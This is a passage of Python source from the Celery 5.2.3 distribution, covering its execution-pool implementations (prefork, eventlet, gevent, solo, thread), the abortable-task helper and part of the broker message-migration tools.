don't know if # the process wrote/read anything from them, and if so we cannot # restore the message boundaries. if not job._accepted: # job was not acked, so find another worker to send it to. 
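# Illustrative sketch (editor-added, not part of the original module): the
# per-process share formatting used by ``human_write_stats`` above.

def _example_write_stat_shares(counts=(3, 1, 0, 4)):
    total = sum(counts)

    def per(v):
        return f'{(float(v) / total) if v else 0:.2f}'

    return {'total': total, 'all': ', '.join(per(v) for v in counts)}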
self._put_back(job) writer = _get_job_writer(job) if writer: self._active_writers.discard(writer) del writer if not proc.dead: proc.dead = True # Replace queues to avoid reuse before = len(self._queues) try: queues = self._find_worker_queues(proc) if self.destroy_queues(queues, proc): self._queues[self.create_process_queues()] = None except ValueError: pass assert len(self._queues) == before def destroy_queues(self, queues, proc): """Destroy queues that can no longer be used. This way they can be replaced by new usable sockets. """ assert not proc._is_alive() self._waiting_to_start.discard(proc) removed = 1 try: self._queues.pop(queues) except KeyError: removed = 0 try: self.on_inqueue_close(queues[0]._writer.fileno(), proc) except OSError: pass for queue in queues: if queue: for sock in (queue._reader, queue._writer): if not sock.closed: self.hub_remove(sock) try: sock.close() except OSError: pass return removed def _create_payload(self, type_, args, dumps=_pickle.dumps, pack=pack, protocol=HIGHEST_PROTOCOL): body = dumps((type_, args), protocol=protocol) size = len(body) header = pack('>I', size) return header, body, size @classmethod def _set_result_sentinel(cls, _outqueue, _pool): # unused pass def _help_stuff_finish_args(self): # Pool._help_stuff_finished is a classmethod so we have to use this # trick to modify the arguments passed to it. return (self._pool,) @classmethod def _help_stuff_finish(cls, pool): # pylint: disable=arguments-differ debug( 'removing tasks from inqueue until task handler finished', ) fileno_to_proc = {} inqR = set() for w in pool: try: fd = w.inq._reader.fileno() inqR.add(fd) fileno_to_proc[fd] = w except OSError: pass while inqR: readable, _, again = _select(inqR, timeout=0.5) if again: continue if not readable: break for fd in readable: fileno_to_proc[fd].inq._reader.recv() sleep(0) @property def timers(self): return {self.maintain_pool: 5.0} ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/concurrency/base.py0000664000175000017500000001042500000000000020000 0ustar00asifasif00000000000000"""Base Execution Pool.""" import logging import os import sys import time from billiard.einfo import ExceptionInfo from billiard.exceptions import WorkerLostError from kombu.utils.encoding import safe_repr from celery.exceptions import WorkerShutdown, WorkerTerminate, reraise from celery.utils import timer2 from celery.utils.log import get_logger from celery.utils.text import truncate __all__ = ('BasePool', 'apply_target') logger = get_logger('celery.pool') def apply_target(target, args=(), kwargs=None, callback=None, accept_callback=None, pid=None, getpid=os.getpid, propagate=(), monotonic=time.monotonic, **_): """Apply function within pool context.""" kwargs = {} if not kwargs else kwargs if accept_callback: accept_callback(pid or getpid(), monotonic()) try: ret = target(*args, **kwargs) except propagate: raise except Exception: raise except (WorkerShutdown, WorkerTerminate): raise except BaseException as exc: try: reraise(WorkerLostError, WorkerLostError(repr(exc)), sys.exc_info()[2]) except WorkerLostError: callback(ExceptionInfo()) else: callback(ret) class BasePool: """Task pool.""" RUN = 0x1 CLOSE = 0x2 TERMINATE = 0x3 Timer = timer2.Timer #: set to true if the pool can be shutdown from within #: a signal handler. signal_safe = True #: set to true if pool uses greenlets. 
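# Illustrative sketch (editor-added, not part of this module): driving the
# ``apply_target`` helper from celery.concurrency.base above directly; on
# success the callback receives the return value, on failure an ExceptionInfo
# wrapping a WorkerLostError.

def _example_apply_target():
    from celery.concurrency.base import apply_target

    results = []
    apply_target(lambda x, y: x + y, args=(1, 2), callback=results.append)
    return results   # -> [3]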
is_green = False _state = None _pool = None _does_debug = True #: only used by multiprocessing pool uses_semaphore = False task_join_will_block = True body_can_be_buffer = False def __init__(self, limit=None, putlocks=True, forking_enable=True, callbacks_propagate=(), app=None, **options): self.limit = limit self.putlocks = putlocks self.options = options self.forking_enable = forking_enable self.callbacks_propagate = callbacks_propagate self.app = app def on_start(self): pass def did_start_ok(self): return True def flush(self): pass def on_stop(self): pass def register_with_event_loop(self, loop): pass def on_apply(self, *args, **kwargs): pass def on_terminate(self): pass def on_soft_timeout(self, job): pass def on_hard_timeout(self, job): pass def maintain_pool(self, *args, **kwargs): pass def terminate_job(self, pid, signal=None): raise NotImplementedError( f'{type(self)} does not implement kill_job') def restart(self): raise NotImplementedError( f'{type(self)} does not implement restart') def stop(self): self.on_stop() self._state = self.TERMINATE def terminate(self): self._state = self.TERMINATE self.on_terminate() def start(self): self._does_debug = logger.isEnabledFor(logging.DEBUG) self.on_start() self._state = self.RUN def close(self): self._state = self.CLOSE self.on_close() def on_close(self): pass def apply_async(self, target, args=None, kwargs=None, **options): """Equivalent of the :func:`apply` built-in function. Callbacks should optimally return as soon as possible since otherwise the thread which handles the result will get blocked. """ kwargs = {} if not kwargs else kwargs args = [] if not args else args if self._does_debug: logger.debug('TaskPool: Apply %s (args:%s kwargs:%s)', target, truncate(safe_repr(args), 1024), truncate(safe_repr(kwargs), 1024)) return self.on_apply(target, args, kwargs, waitforslot=self.putlocks, callbacks_propagate=self.callbacks_propagate, **options) def _get_info(self): return { 'max-concurrency': self.limit, } @property def info(self): return self._get_info() @property def active(self): return self._state == self.RUN @property def num_processes(self): return self.limit ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/concurrency/eventlet.py0000664000175000017500000001200600000000000020711 0ustar00asifasif00000000000000"""Eventlet execution pool.""" import sys from time import monotonic from greenlet import GreenletExit from kombu.asynchronous import timer as _timer from celery import signals from . import base __all__ = ('TaskPool',) W_RACE = """\ Celery module with %s imported before eventlet patched\ """ RACE_MODS = ('billiard.', 'celery.', 'kombu.') #: Warn if we couldn't patch early enough, #: and thread/socket depending celery modules have already been loaded. 
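# Illustrative sketch (editor-added, not part of the original module): the
# import ordering the race check below guards against -- monkey-patch eventlet
# before celery/kombu/billiard are imported, otherwise the already-imported
# thread and socket primitives are the unpatched ones:
#
#     import eventlet
#     eventlet.monkey_patch()
#
#     from celery import Celery   # safe: imported after patching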
for mod in (mod for mod in sys.modules if mod.startswith(RACE_MODS)): for side in ('thread', 'threading', 'socket'): # pragma: no cover if getattr(mod, side, None): import warnings warnings.warn(RuntimeWarning(W_RACE % side)) def apply_target(target, args=(), kwargs=None, callback=None, accept_callback=None, getpid=None): kwargs = {} if not kwargs else kwargs return base.apply_target(target, args, kwargs, callback, accept_callback, pid=getpid()) class Timer(_timer.Timer): """Eventlet Timer.""" def __init__(self, *args, **kwargs): from eventlet.greenthread import spawn_after from greenlet import GreenletExit super().__init__(*args, **kwargs) self.GreenletExit = GreenletExit self._spawn_after = spawn_after self._queue = set() def _enter(self, eta, priority, entry, **kwargs): secs = max(eta - monotonic(), 0) g = self._spawn_after(secs, entry) self._queue.add(g) g.link(self._entry_exit, entry) g.entry = entry g.eta = eta g.priority = priority g.canceled = False return g def _entry_exit(self, g, entry): try: try: g.wait() except self.GreenletExit: entry.cancel() g.canceled = True finally: self._queue.discard(g) def clear(self): queue = self._queue while queue: try: queue.pop().cancel() except (KeyError, self.GreenletExit): pass def cancel(self, tref): try: tref.cancel() except self.GreenletExit: pass @property def queue(self): return self._queue class TaskPool(base.BasePool): """Eventlet Task Pool.""" Timer = Timer signal_safe = False is_green = True task_join_will_block = False _pool = None _pool_map = None _quick_put = None def __init__(self, *args, **kwargs): from eventlet import greenthread from eventlet.greenpool import GreenPool self.Pool = GreenPool self.getcurrent = greenthread.getcurrent self.getpid = lambda: id(greenthread.getcurrent()) self.spawn_n = greenthread.spawn_n super().__init__(*args, **kwargs) def on_start(self): self._pool = self.Pool(self.limit) self._pool_map = {} signals.eventlet_pool_started.send(sender=self) self._quick_put = self._pool.spawn self._quick_apply_sig = signals.eventlet_pool_apply.send def on_stop(self): signals.eventlet_pool_preshutdown.send(sender=self) if self._pool is not None: self._pool.waitall() signals.eventlet_pool_postshutdown.send(sender=self) def on_apply(self, target, args=None, kwargs=None, callback=None, accept_callback=None, **_): target = TaskPool._make_killable_target(target) self._quick_apply_sig(sender=self, target=target, args=args, kwargs=kwargs,) greenlet = self._quick_put( apply_target, target, args, kwargs, callback, accept_callback, self.getpid ) self._add_to_pool_map(id(greenlet), greenlet) def grow(self, n=1): limit = self.limit + n self._pool.resize(limit) self.limit = limit def shrink(self, n=1): limit = self.limit - n self._pool.resize(limit) self.limit = limit def terminate_job(self, pid, signal=None): if pid in self._pool_map.keys(): greenlet = self._pool_map[pid] greenlet.kill() greenlet.wait() def _get_info(self): info = super()._get_info() info.update({ 'max-concurrency': self.limit, 'free-threads': self._pool.free(), 'running-threads': self._pool.running(), }) return info @staticmethod def _make_killable_target(target): def killable_target(*args, **kwargs): try: return target(*args, **kwargs) except GreenletExit: return (False, None, None) return killable_target def _add_to_pool_map(self, pid, greenlet): self._pool_map[pid] = greenlet greenlet.link( TaskPool._cleanup_after_job_finish, self._pool_map, pid ) @staticmethod def _cleanup_after_job_finish(greenlet, pool_map, pid): del pool_map[pid] 
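# Illustrative sketch (editor-added, not part of the original module): selecting
# the eventlet pool above when starting a worker; the concurrency value is the
# number of greenthreads in the GreenPool rather than OS processes:
#
#     celery -A proj worker --pool eventlet --concurrency 1000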
././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/concurrency/gevent.py0000664000175000017500000000651700000000000020365 0ustar00asifasif00000000000000"""Gevent execution pool.""" from time import monotonic from kombu.asynchronous import timer as _timer from . import base try: from gevent import Timeout except ImportError: # pragma: no cover Timeout = None __all__ = ('TaskPool',) # pylint: disable=redefined-outer-name # We cache globals and attribute lookups, so disable this warning. def apply_timeout(target, args=(), kwargs=None, callback=None, accept_callback=None, pid=None, timeout=None, timeout_callback=None, Timeout=Timeout, apply_target=base.apply_target, **rest): kwargs = {} if not kwargs else kwargs try: with Timeout(timeout): return apply_target(target, args, kwargs, callback, accept_callback, pid, propagate=(Timeout,), **rest) except Timeout: return timeout_callback(False, timeout) class Timer(_timer.Timer): def __init__(self, *args, **kwargs): from gevent import Greenlet, GreenletExit class _Greenlet(Greenlet): cancel = Greenlet.kill self._Greenlet = _Greenlet self._GreenletExit = GreenletExit super().__init__(*args, **kwargs) self._queue = set() def _enter(self, eta, priority, entry, **kwargs): secs = max(eta - monotonic(), 0) g = self._Greenlet.spawn_later(secs, entry) self._queue.add(g) g.link(self._entry_exit) g.entry = entry g.eta = eta g.priority = priority g.canceled = False return g def _entry_exit(self, g): try: g.kill() finally: self._queue.discard(g) def clear(self): queue = self._queue while queue: try: queue.pop().kill() except KeyError: pass @property def queue(self): return self._queue class TaskPool(base.BasePool): """GEvent Pool.""" Timer = Timer signal_safe = False is_green = True task_join_will_block = False _pool = None _quick_put = None def __init__(self, *args, **kwargs): from gevent import spawn_raw from gevent.pool import Pool self.Pool = Pool self.spawn_n = spawn_raw self.timeout = kwargs.get('timeout') super().__init__(*args, **kwargs) def on_start(self): self._pool = self.Pool(self.limit) self._quick_put = self._pool.spawn def on_stop(self): if self._pool is not None: self._pool.join() def on_apply(self, target, args=None, kwargs=None, callback=None, accept_callback=None, timeout=None, timeout_callback=None, apply_target=base.apply_target, **_): timeout = self.timeout if timeout is None else timeout return self._quick_put(apply_timeout if timeout else apply_target, target, args, kwargs, callback, accept_callback, timeout=timeout, timeout_callback=timeout_callback) def grow(self, n=1): self._pool._semaphore.counter += n self._pool.size += n def shrink(self, n=1): self._pool._semaphore.counter -= n self._pool.size -= n @property def num_processes(self): return len(self._pool) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/concurrency/prefork.py0000664000175000017500000001323500000000000020540 0ustar00asifasif00000000000000"""Prefork execution pool. Pool implementation using :mod:`multiprocessing`. 
""" import os from billiard import forking_enable from billiard.common import REMAP_SIGTERM, TERM_SIGNAME from billiard.pool import CLOSE, RUN from billiard.pool import Pool as BlockingPool from celery import platforms, signals from celery._state import _set_task_join_will_block, set_default_app from celery.app import trace from celery.concurrency.base import BasePool from celery.utils.functional import noop from celery.utils.log import get_logger from .asynpool import AsynPool __all__ = ('TaskPool', 'process_initializer', 'process_destructor') #: List of signals to reset when a child process starts. WORKER_SIGRESET = { 'SIGTERM', 'SIGHUP', 'SIGTTIN', 'SIGTTOU', 'SIGUSR1', } #: List of signals to ignore when a child process starts. if REMAP_SIGTERM: WORKER_SIGIGNORE = {'SIGINT', TERM_SIGNAME} else: WORKER_SIGIGNORE = {'SIGINT'} logger = get_logger(__name__) warning, debug = logger.warning, logger.debug def process_initializer(app, hostname): """Pool child process initializer. Initialize the child pool process to ensure the correct app instance is used and things like logging works. """ # Each running worker gets SIGKILL by OS when main process exits. platforms.set_pdeathsig('SIGKILL') _set_task_join_will_block(True) platforms.signals.reset(*WORKER_SIGRESET) platforms.signals.ignore(*WORKER_SIGIGNORE) platforms.set_mp_process_title('celeryd', hostname=hostname) # This is for Windows and other platforms not supporting # fork(). Note that init_worker makes sure it's only # run once per process. app.loader.init_worker() app.loader.init_worker_process() logfile = os.environ.get('CELERY_LOG_FILE') or None if logfile and '%i' in logfile.lower(): # logfile path will differ so need to set up logging again. app.log.already_setup = False app.log.setup(int(os.environ.get('CELERY_LOG_LEVEL', 0) or 0), logfile, bool(os.environ.get('CELERY_LOG_REDIRECT', False)), str(os.environ.get('CELERY_LOG_REDIRECT_LEVEL')), hostname=hostname) if os.environ.get('FORKED_BY_MULTIPROCESSING'): # pool did execv after fork trace.setup_worker_optimizations(app, hostname) else: app.set_current() set_default_app(app) app.finalize() trace._tasks = app._tasks # enables fast_trace_task optimization. # rebuild execution handler for all tasks. from celery.app.trace import build_tracer for name, task in app.tasks.items(): task.__trace__ = build_tracer(name, task, app.loader, hostname, app=app) from celery.worker import state as worker_state worker_state.reset_state() signals.worker_process_init.send(sender=None) def process_destructor(pid, exitcode): """Pool child process destructor. Dispatch the :signal:`worker_process_shutdown` signal. 
""" signals.worker_process_shutdown.send( sender=None, pid=pid, exitcode=exitcode, ) class TaskPool(BasePool): """Multiprocessing Pool implementation.""" Pool = AsynPool BlockingPool = BlockingPool uses_semaphore = True write_stats = None def on_start(self): forking_enable(self.forking_enable) Pool = (self.BlockingPool if self.options.get('threads', True) else self.Pool) proc_alive_timeout = ( self.app.conf.worker_proc_alive_timeout if self.app else None ) P = self._pool = Pool(processes=self.limit, initializer=process_initializer, on_process_exit=process_destructor, enable_timeouts=True, synack=False, proc_alive_timeout=proc_alive_timeout, **self.options) # Create proxy methods self.on_apply = P.apply_async self.maintain_pool = P.maintain_pool self.terminate_job = P.terminate_job self.grow = P.grow self.shrink = P.shrink self.flush = getattr(P, 'flush', None) # FIXME add to billiard def restart(self): self._pool.restart() self._pool.apply_async(noop) def did_start_ok(self): return self._pool.did_start_ok() def register_with_event_loop(self, loop): try: reg = self._pool.register_with_event_loop except AttributeError: return return reg(loop) def on_stop(self): """Gracefully stop the pool.""" if self._pool is not None and self._pool._state in (RUN, CLOSE): self._pool.close() self._pool.join() self._pool = None def on_terminate(self): """Force terminate the pool.""" if self._pool is not None: self._pool.terminate() self._pool = None def on_close(self): if self._pool is not None and self._pool._state == RUN: self._pool.close() def _get_info(self): write_stats = getattr(self._pool, 'human_write_stats', None) return { 'max-concurrency': self.limit, 'processes': [p.pid for p in self._pool._pool], 'max-tasks-per-child': self._pool._maxtasksperchild or 'N/A', 'put-guarded-by-semaphore': self.putlocks, 'timeouts': (self._pool.soft_timeout or 0, self._pool.timeout or 0), 'writes': write_stats() if write_stats is not None else 'N/A', } @property def num_processes(self): return self._pool._processes ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/concurrency/solo.py0000664000175000017500000000126500000000000020044 0ustar00asifasif00000000000000"""Single-threaded execution pool.""" import os from celery import signals from .base import BasePool, apply_target __all__ = ('TaskPool',) class TaskPool(BasePool): """Solo task pool (blocking, inline, fast).""" body_can_be_buffer = True def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.on_apply = apply_target self.limit = 1 signals.worker_process_init.send(sender=None) def _get_info(self): return { 'max-concurrency': 1, 'processes': [os.getpid()], 'max-tasks-per-child': None, 'put-guarded-by-semaphore': True, 'timeouts': (), } ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/concurrency/thread.py0000664000175000017500000000234000000000000020332 0ustar00asifasif00000000000000"""Thread execution pool.""" from concurrent.futures import ThreadPoolExecutor, wait from .base import BasePool, apply_target __all__ = ('TaskPool',) class ApplyResult: def __init__(self, future): self.f = future self.get = self.f.result def wait(self, timeout=None): wait([self.f], timeout) class TaskPool(BasePool): """Thread Task Pool.""" body_can_be_buffer = True signal_safe = False def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.executor = 
ThreadPoolExecutor(max_workers=self.limit) def on_stop(self): self.executor.shutdown() super().on_stop() def on_apply(self, target, args=None, kwargs=None, callback=None, accept_callback=None, **_): f = self.executor.submit(apply_target, target, args, kwargs, callback, accept_callback) return ApplyResult(f) def _get_info(self): return { 'max-concurrency': self.limit, 'threads': len(self.executor._threads) # TODO use a public api to retrieve the current number of threads # in the executor when available. (Currently not available). } ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.4437504 celery-5.2.3/celery/contrib/0000775000175000017500000000000000000000000015620 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/contrib/__init__.py0000664000175000017500000000000000000000000017717 0ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/contrib/abortable.py0000664000175000017500000001174300000000000020133 0ustar00asifasif00000000000000"""Abortable Tasks. Abortable tasks overview ========================= For long-running :class:`Task`'s, it can be desirable to support aborting during execution. Of course, these tasks should be built to support abortion specifically. The :class:`AbortableTask` serves as a base class for all :class:`Task` objects that should support abortion by producers. * Producers may invoke the :meth:`abort` method on :class:`AbortableAsyncResult` instances, to request abortion. * Consumers (workers) should periodically check (and honor!) the :meth:`is_aborted` method at controlled points in their task's :meth:`run` method. The more often, the better. The necessary intermediate communication is dealt with by the :class:`AbortableTask` implementation. Usage example ------------- In the consumer: .. code-block:: python from __future__ import absolute_import from celery.contrib.abortable import AbortableTask from celery.utils.log import get_task_logger from proj.celery import app logger = get_logger(__name__) @app.task(bind=True, base=AbortableTask) def long_running_task(self): results = [] for i in range(100): # check after every 5 iterations... # (or alternatively, check when some timer is due) if not i % 5: if self.is_aborted(): # respect aborted state, and terminate gracefully. logger.warning('Task aborted') return value = do_something_expensive(i) results.append(y) logger.info('Task complete') return results In the producer: .. code-block:: python from __future__ import absolute_import import time from proj.tasks import MyLongRunningTask def myview(request): # result is of type AbortableAsyncResult result = long_running_task.delay() # abort the task after 10 seconds time.sleep(10) result.abort() After the `result.abort()` call, the task execution isn't aborted immediately. In fact, it's not guaranteed to abort at all. Keep checking `result.state` status, or call `result.get(timeout=)` to have it block until the task is finished. .. note:: In order to abort tasks, there needs to be communication between the producer and the consumer. This is currently implemented through the database backend. Therefore, this class will only work with the database backends. """ from celery import Task from celery.result import AsyncResult __all__ = ('AbortableAsyncResult', 'AbortableTask') """ Task States ----------- .. 
state:: ABORTED ABORTED ~~~~~~~ Task is aborted (typically by the producer) and should be aborted as soon as possible. """ ABORTED = 'ABORTED' class AbortableAsyncResult(AsyncResult): """Represents an abortable result. Specifically, this gives the `AsyncResult` a :meth:`abort()` method, that sets the state of the underlying Task to `'ABORTED'`. """ def is_aborted(self): """Return :const:`True` if the task is (being) aborted.""" return self.state == ABORTED def abort(self): """Set the state of the task to :const:`ABORTED`. Abortable tasks monitor their state at regular intervals and terminate execution if so. Warning: Be aware that invoking this method does not guarantee when the task will be aborted (or even if the task will be aborted at all). """ # TODO: store_result requires all four arguments to be set, # but only state should be updated here return self.backend.store_result(self.id, result=None, state=ABORTED, traceback=None) class AbortableTask(Task): """Task that can be aborted. This serves as a base class for all :class:`Task`'s that support aborting during execution. All subclasses of :class:`AbortableTask` must call the :meth:`is_aborted` method periodically and act accordingly when the call evaluates to :const:`True`. """ abstract = True def AsyncResult(self, task_id): """Return the accompanying AbortableAsyncResult instance.""" return AbortableAsyncResult(task_id, backend=self.backend) def is_aborted(self, **kwargs): """Return true if task is aborted. Checks against the backend whether this :class:`AbortableAsyncResult` is :const:`ABORTED`. Always return :const:`False` in case the `task_id` parameter refers to a regular (non-abortable) :class:`Task`. Be aware that invoking this method will cause a hit in the backend (for example a database query), so find a good balance between calling it regularly (for responsiveness), but not too often (for performance). """ task_id = kwargs.get('task_id', self.request.id) result = self.AsyncResult(task_id) if not isinstance(result, AbortableAsyncResult): return False return result.is_aborted() ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/contrib/migrate.py0000664000175000017500000003352300000000000017630 0ustar00asifasif00000000000000"""Message migration tools (Broker <-> Broker).""" import socket from functools import partial from itertools import cycle, islice from kombu import Queue, eventloop from kombu.common import maybe_declare from kombu.utils.encoding import ensure_bytes from celery.app import app_or_default from celery.utils.nodenames import worker_direct from celery.utils.text import str_to_list __all__ = ( 'StopFiltering', 'State', 'republish', 'migrate_task', 'migrate_tasks', 'move', 'task_id_eq', 'task_id_in', 'start_filter', 'move_task_by_id', 'move_by_idmap', 'move_by_taskmap', 'move_direct', 'move_direct_by_id', ) MOVING_PROGRESS_FMT = """\ Moving task {state.filtered}/{state.strtotal}: \ {body[task]}[{body[id]}]\ """ class StopFiltering(Exception): """Semi-predicate used to signal filter stop.""" class State: """Migration progress state.""" count = 0 filtered = 0 total_apx = 0 @property def strtotal(self): if not self.total_apx: return '?' 
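# ``total_apx`` is only an approximation: it is the sum of the message counts
# reported by ``queue_declare(passive=True)`` when the source queues are
# inspected, so ``'?'`` is shown until that inspection has happened.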
return str(self.total_apx) def __repr__(self): if self.filtered: return f'^{self.filtered}' return f'{self.count}/{self.strtotal}' def republish(producer, message, exchange=None, routing_key=None, remove_props=None): """Republish message.""" if not remove_props: remove_props = ['application_headers', 'content_type', 'content_encoding', 'headers'] body = ensure_bytes(message.body) # use raw message body. info, headers, props = (message.delivery_info, message.headers, message.properties) exchange = info['exchange'] if exchange is None else exchange routing_key = info['routing_key'] if routing_key is None else routing_key ctype, enc = message.content_type, message.content_encoding # remove compression header, as this will be inserted again # when the message is recompressed. compression = headers.pop('compression', None) for key in remove_props: props.pop(key, None) producer.publish(ensure_bytes(body), exchange=exchange, routing_key=routing_key, compression=compression, headers=headers, content_type=ctype, content_encoding=enc, **props) def migrate_task(producer, body_, message, queues=None): """Migrate single task message.""" info = message.delivery_info queues = {} if queues is None else queues republish(producer, message, exchange=queues.get(info['exchange']), routing_key=queues.get(info['routing_key'])) def filter_callback(callback, tasks): def filtered(body, message): if tasks and body['task'] not in tasks: return return callback(body, message) return filtered def migrate_tasks(source, dest, migrate=migrate_task, app=None, queues=None, **kwargs): """Migrate tasks from one broker to another.""" app = app_or_default(app) queues = prepare_queues(queues) producer = app.amqp.Producer(dest, auto_declare=False) migrate = partial(migrate, producer, queues=queues) def on_declare_queue(queue): new_queue = queue(producer.channel) new_queue.name = queues.get(queue.name, queue.name) if new_queue.routing_key == queue.name: new_queue.routing_key = queues.get(queue.name, new_queue.routing_key) if new_queue.exchange.name == queue.name: new_queue.exchange.name = queues.get(queue.name, queue.name) new_queue.declare() return start_filter(app, source, migrate, queues=queues, on_declare_queue=on_declare_queue, **kwargs) def _maybe_queue(app, q): if isinstance(q, str): return app.amqp.queues[q] return q def move(predicate, connection=None, exchange=None, routing_key=None, source=None, app=None, callback=None, limit=None, transform=None, **kwargs): """Find tasks by filtering them and move the tasks to a new queue. Arguments: predicate (Callable): Filter function used to decide the messages to move. Must accept the standard signature of ``(body, message)`` used by Kombu consumer callbacks. If the predicate wants the message to be moved it must return either: 1) a tuple of ``(exchange, routing_key)``, or 2) a :class:`~kombu.entity.Queue` instance, or 3) any other true value means the specified ``exchange`` and ``routing_key`` arguments will be used. connection (kombu.Connection): Custom connection to use. source: List[Union[str, kombu.Queue]]: Optional list of source queues to use instead of the default (queues in :setting:`task_queues`). This list can also contain :class:`~kombu.entity.Queue` instances. exchange (str, kombu.Exchange): Default destination exchange. routing_key (str): Default destination routing key. limit (int): Limit number of messages to filter. callback (Callable): Callback called after message moved, with signature ``(state, body, message)``. 
transform (Callable): Optional function to transform the return value (destination) of the filter function. Also supports the same keyword arguments as :func:`start_filter`. To demonstrate, the :func:`move_task_by_id` operation can be implemented like this: .. code-block:: python def is_wanted_task(body, message): if body['id'] == wanted_id: return Queue('foo', exchange=Exchange('foo'), routing_key='foo') move(is_wanted_task) or with a transform: .. code-block:: python def transform(value): if isinstance(value, str): return Queue(value, Exchange(value), value) return value move(is_wanted_task, transform=transform) Note: The predicate may also return a tuple of ``(exchange, routing_key)`` to specify the destination to where the task should be moved, or a :class:`~kombu.entity.Queue` instance. Any other true value means that the task will be moved to the default exchange/routing_key. """ app = app_or_default(app) queues = [_maybe_queue(app, queue) for queue in source or []] or None with app.connection_or_acquire(connection, pool=False) as conn: producer = app.amqp.Producer(conn) state = State() def on_task(body, message): ret = predicate(body, message) if ret: if transform: ret = transform(ret) if isinstance(ret, Queue): maybe_declare(ret, conn.default_channel) ex, rk = ret.exchange.name, ret.routing_key else: ex, rk = expand_dest(ret, exchange, routing_key) republish(producer, message, exchange=ex, routing_key=rk) message.ack() state.filtered += 1 if callback: callback(state, body, message) if limit and state.filtered >= limit: raise StopFiltering() return start_filter(app, conn, on_task, consume_from=queues, **kwargs) def expand_dest(ret, exchange, routing_key): try: ex, rk = ret except (TypeError, ValueError): ex, rk = exchange, routing_key return ex, rk def task_id_eq(task_id, body, message): """Return true if task id equals task_id'.""" return body['id'] == task_id def task_id_in(ids, body, message): """Return true if task id is member of set ids'.""" return body['id'] in ids def prepare_queues(queues): if isinstance(queues, str): queues = queues.split(',') if isinstance(queues, list): queues = dict(tuple(islice(cycle(q.split(':')), None, 2)) for q in queues) if queues is None: queues = {} return queues class Filterer: def __init__(self, app, conn, filter, limit=None, timeout=1.0, ack_messages=False, tasks=None, queues=None, callback=None, forever=False, on_declare_queue=None, consume_from=None, state=None, accept=None, **kwargs): self.app = app self.conn = conn self.filter = filter self.limit = limit self.timeout = timeout self.ack_messages = ack_messages self.tasks = set(str_to_list(tasks) or []) self.queues = prepare_queues(queues) self.callback = callback self.forever = forever self.on_declare_queue = on_declare_queue self.consume_from = [ _maybe_queue(self.app, q) for q in consume_from or list(self.queues) ] self.state = state or State() self.accept = accept def start(self): # start migrating messages. 
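# Drain the source queues in a kombu eventloop: iteration stops when the
# per-cycle ``timeout`` expires (unless ``forever`` is set), or when ``limit``
# messages have been filtered and :class:`StopFiltering` is raised.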
with self.prepare_consumer(self.create_consumer()): try: for _ in eventloop(self.conn, # pragma: no cover timeout=self.timeout, ignore_timeouts=self.forever): pass except socket.timeout: pass except StopFiltering: pass return self.state def update_state(self, body, message): self.state.count += 1 if self.limit and self.state.count >= self.limit: raise StopFiltering() def ack_message(self, body, message): message.ack() def create_consumer(self): return self.app.amqp.TaskConsumer( self.conn, queues=self.consume_from, accept=self.accept, ) def prepare_consumer(self, consumer): filter = self.filter update_state = self.update_state ack_message = self.ack_message if self.tasks: filter = filter_callback(filter, self.tasks) update_state = filter_callback(update_state, self.tasks) ack_message = filter_callback(ack_message, self.tasks) consumer.register_callback(filter) consumer.register_callback(update_state) if self.ack_messages: consumer.register_callback(self.ack_message) if self.callback is not None: callback = partial(self.callback, self.state) if self.tasks: callback = filter_callback(callback, self.tasks) consumer.register_callback(callback) self.declare_queues(consumer) return consumer def declare_queues(self, consumer): # declare all queues on the new broker. for queue in consumer.queues: if self.queues and queue.name not in self.queues: continue if self.on_declare_queue is not None: self.on_declare_queue(queue) try: _, mcount, _ = queue( consumer.channel).queue_declare(passive=True) if mcount: self.state.total_apx += mcount except self.conn.channel_errors: pass def start_filter(app, conn, filter, limit=None, timeout=1.0, ack_messages=False, tasks=None, queues=None, callback=None, forever=False, on_declare_queue=None, consume_from=None, state=None, accept=None, **kwargs): """Filter tasks.""" return Filterer( app, conn, filter, limit=limit, timeout=timeout, ack_messages=ack_messages, tasks=tasks, queues=queues, callback=callback, forever=forever, on_declare_queue=on_declare_queue, consume_from=consume_from, state=state, accept=accept, **kwargs).start() def move_task_by_id(task_id, dest, **kwargs): """Find a task by id and move it to another queue. Arguments: task_id (str): Id of task to find and move. dest: (str, kombu.Queue): Destination queue. transform (Callable): Optional function to transform the return value (destination) of the filter function. **kwargs (Any): Also supports the same keyword arguments as :func:`move`. """ return move_by_idmap({task_id: dest}, **kwargs) def move_by_idmap(map, **kwargs): """Move tasks by matching from a ``task_id: queue`` mapping. Where ``queue`` is a queue to move the task to. Example: >>> move_by_idmap({ ... '5bee6e82-f4ac-468e-bd3d-13e8600250bc': Queue('name'), ... 'ada8652d-aef3-466b-abd2-becdaf1b82b3': Queue('name'), ... '3a2b140d-7db1-41ba-ac90-c36a0ef4ab1f': Queue('name')}, ... queues=['hipri']) """ def task_id_in_map(body, message): return map.get(message.properties['correlation_id']) # adding the limit means that we don't have to consume any more # when we've found everything. return move(task_id_in_map, limit=len(map), **kwargs) def move_by_taskmap(map, **kwargs): """Move tasks by matching from a ``task_name: queue`` mapping. ``queue`` is the queue to move the task to. Example: >>> move_by_taskmap({ ... 'tasks.add': Queue('name'), ... 'tasks.mul': Queue('name'), ... 
